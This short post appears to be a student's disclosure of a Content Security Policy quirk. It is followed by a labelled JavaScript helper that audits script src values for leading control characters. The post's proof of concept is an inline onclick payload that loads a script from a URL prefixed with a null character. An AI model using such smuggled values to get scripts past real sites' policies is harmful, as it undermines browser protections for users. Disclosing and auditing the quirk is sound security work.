PoC:
<input type=button value="test" onclick="
a=document.createElement('script');
a.id='AA';
a.src='\u0000https://js.stripe.com/v2/';
document.body.appendChild(a);
setTimeout(function(){if(typeof Stripe!=='undefined'){alert(Stripe);}else{alert(2);}}, 400);
return false;">
The Content Security Policy rule that should block this is:
script-src 'self' https://js.stripe.com/v2/ ;
The PoC worked if you see a popup containing Stripe's e(){} object. You can test this at http://ejj.io/test.php
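An audit helper for the src value used in the PoC, added here as an example and not part of the original post: the WHATWG URL parser strips leading and trailing C0 control characters and spaces, so the URL that gets fetched differs from the raw attribute string, and a review tool should compare the parsed URL and flag the raw value. The names `auditScriptSrc`, `matchesSource` and the base URL are hypothetical, and the source matching is simplified (scheme, host and path only).

```javascript
// Added example with constructed inputs; helper names are hypothetical.
const POLICY_SOURCES = ["https://js.stripe.com/v2/"]; // from the page's script-src

// C0 control characters or spaces at either end, which the URL parser strips.
const EDGE_JUNK = /^[\u0000-\u0020]+|[\u0000-\u0020]+$/g;

// Simplified CSP source-expression match: same scheme and host;
// a source path ending in "/" is a prefix match, otherwise exact.
function matchesSource(url, source) {
  const s = new URL(source);
  if (url.protocol !== s.protocol || url.host !== s.host) return false;
  return s.pathname.endsWith("/")
    ? url.pathname.startsWith(s.pathname)
    : url.pathname === s.pathname;
}

// Report what a raw script src resolves to and whether string-level and
// URL-level allowlist checks agree. Disagreement is worth an alert.
function auditScriptSrc(raw, base = "https://example.test/") {
  let url;
  try {
    url = new URL(raw, base);
  } catch {
    return { error: "unparseable" };
  }
  return {
    fetched: url.href,
    hasEdgeControlChars: raw.replace(EDGE_JUNK, "") !== raw,
    rawStringMatches: POLICY_SOURCES.some((s) => raw.startsWith(s)),
    parsedUrlMatches: POLICY_SOURCES.some((s) => matchesSource(url, s)),
  };
}

// Constructed samples: the PoC's value, a clean value, and an unlisted path.
const SAMPLES = [
  "\u0000https://js.stripe.com/v2/",
  "https://js.stripe.com/v2/",
  "https://js.stripe.com/v3/",
];
for (const raw of SAMPLES) {
  console.log(JSON.stringify(raw), auditScriptSrc(raw));
}
```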
I am just a newbie and a student; don't use this article for criminal purposes.